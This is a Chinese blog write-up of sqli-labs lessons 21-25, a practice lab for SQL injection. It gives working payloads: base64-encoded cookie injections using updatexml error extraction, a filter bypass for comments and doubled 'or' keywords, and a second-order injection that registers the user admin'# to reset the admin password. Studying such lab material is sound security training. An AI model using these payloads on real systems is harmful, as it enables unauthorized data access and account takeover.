sqli-labs通关21-25

已于 2023-03-25 14:39:24 修改
阅读量98 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: mysql 数据库
于 2023-02-21 21:57:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129149637
版权

目录

1.lesson-21cookie注入

2.lesson-22 Cookie注入

3. lesson-23 updatexml报错注入

4.lesson-24 二次注入

5.双写order

1.lesson-21cookie注入

还是需要登录成功

判断注入闭合 为单引号括号的注入

cookie base64解码 ,发现是admin 

YScpIw==  #解码后是a')#

查用户

YScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXIoKSksMHg3ZSksMSkj
#解码后是a') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#

2.lesson-22 Cookie注入

判断注入类型 

为双引号注入

YSIj #base64解码后为a"#

查用户

YSIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgdXNlcigpKSwweDdlKSwxKSM=
#base64解码a" and updatexml(1,concat(0x7e,(select user()),0x7e),1)#

3. lesson-23 updatexml报错注入

判断注入:

?id=1' or '1'='1

其他注释不可用,把这些符号过滤掉了

if(isset($_GET['id']))
{
$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

查用户:

?id=1' or  updatexml(1,concat(0x7e,(select user()),0x7e),1) or '1'='1

4.lesson-24 二次注入

本关源码共有8个php文件

流程 首先进入的是index.php,然后开启session,提交到login.php,session和cookie分别储存username和auth,username为通过username数据库查询的username,跳转到logged-in.php,改密码就跳转到pass_chaged.php,用户名是通过session获取的,所有这个地方可能有漏洞,其他文件通过html获取用户名和密码,都使用了mysql_escape_string()函数,,创建用户时会跳转到new-user.php,数据提交到login_create.php,然后跳转到index.php,forgot.php没东西,不能用

 新建一个用户admin'#,为什么这么创建,为单引号注入且username是从session中读取

$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

然后在重置密码,随便设即可登录成功,不能进行or updatexml(1,concat(0x7e,(select user()),0x7e),1) #读取是因为字段长度有限制

5.双写order

过滤了and和or

判断注入

单引号注入

?id=1' -- +

判断列数 

?id=1' ororder by 5-- +

查用户:

?id=-1' union select 1,user(),3-- +

mysql开启日志:

(33条消息) Mysql日志开启_慕書的博客-CSDN博客_mysql开启日志https://blog.csdn.net/weixin_44950652/article/details/117080396二次注入参考文章:

(33条消息) sqli-labs通关(less21~less30)_仙女象的博客-CSDN博客https://blog.csdn.net/elephantxiang/article/details/119855881

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQli-labs 进阶 21-38关
感恩
09-15 335
SQLI-LAB less21~38
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs/Less-21
m0_71299382的博客
11-19 259
sqli-labs第二十一关
SQLi LABS Less-21_sqlilibs less21(1),网络安全校招面试指南
最新发布
2401_83974570的博客
04-18 225
点击提交按钮的时候,会从cookie中获取保存的用户名,使用base64解密后,查询数据库,来验证用户是否处于登录状态,我们可以修改cookie的值,从而进行SQL注入。先输入正确的用户名和密码,登录成功后刷新页面,并使用代理软件(Burp Suite)拦截请求,可以看到Cookie中保存了base64加密后的用户名。我们将用户名进行解密(先使用url解码,再使用base64解码),可获得编码前的用户名。,用户登录成功后,将用户名进行base64加密后,保存在cookie中。
sqli-labs 21 - 30关
weixin_44843084的博客
05-29 365
sqli-labs 21 - 30关 less21 登陆后 cookie的uname值是base64加密 试了几次,格式是’) 依旧是3列 剩下的跟上一样 less22 跟上一一样,格式是" less23 又回到get了[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 闭合是’ 直接注释好像有什么问(应该是被过滤了 语句可能是类似id=’$id’ limit 0,1?(好像真的是 这样是可以的 但是不能1' order by 4 and '1'='1(还是上图
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 337
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
sqli-labs关卡21(基于cookie被base64编码的报错盲注)通关思路
zyh1588的博客
11-28 633
小白回顾sql靶场21
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs第21-28关
永远相信美好的事情即将发生
02-11 1092
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
sqli-labs (less-21)
kukudeshuo的博客
03-11 309
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
sqli-labs第二十一关详解(这次用sqlmap)
金 帛的博客
05-09 2638
SQL靶场第二十一关答案详解,这次用sqlmap跑
sql-labs 闯关 21~25
qq_44663230的博客
08-29 1227
sql-labs 闯关21~25
sqlilabs教程(21-30)
一个安全研究员
05-28 1945
less-21的注入点还是再uname,不过这次uname别base64编码了,我们来看一下源码 首先来看一下这个危险字符过滤函数: 这个不是我们的重点,但是也是它导致我们在登陆界面不能进行注入。我们的重点放在后台代码对cookie中的uname的操作上: 可以看到,我们页面输出的uname的值实际上就是经过base64编码过后的username的值,如果他这里没有进行输入检...
SQL-Labs靶场“21-25”关通关教程
热门推荐
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 932
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqllab闯关记录(21~30)白盒测试
m0_56375711的博客
12-06 385
sqllab闯关记录(20~30关)白盒测试
sqli-labs通关28
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值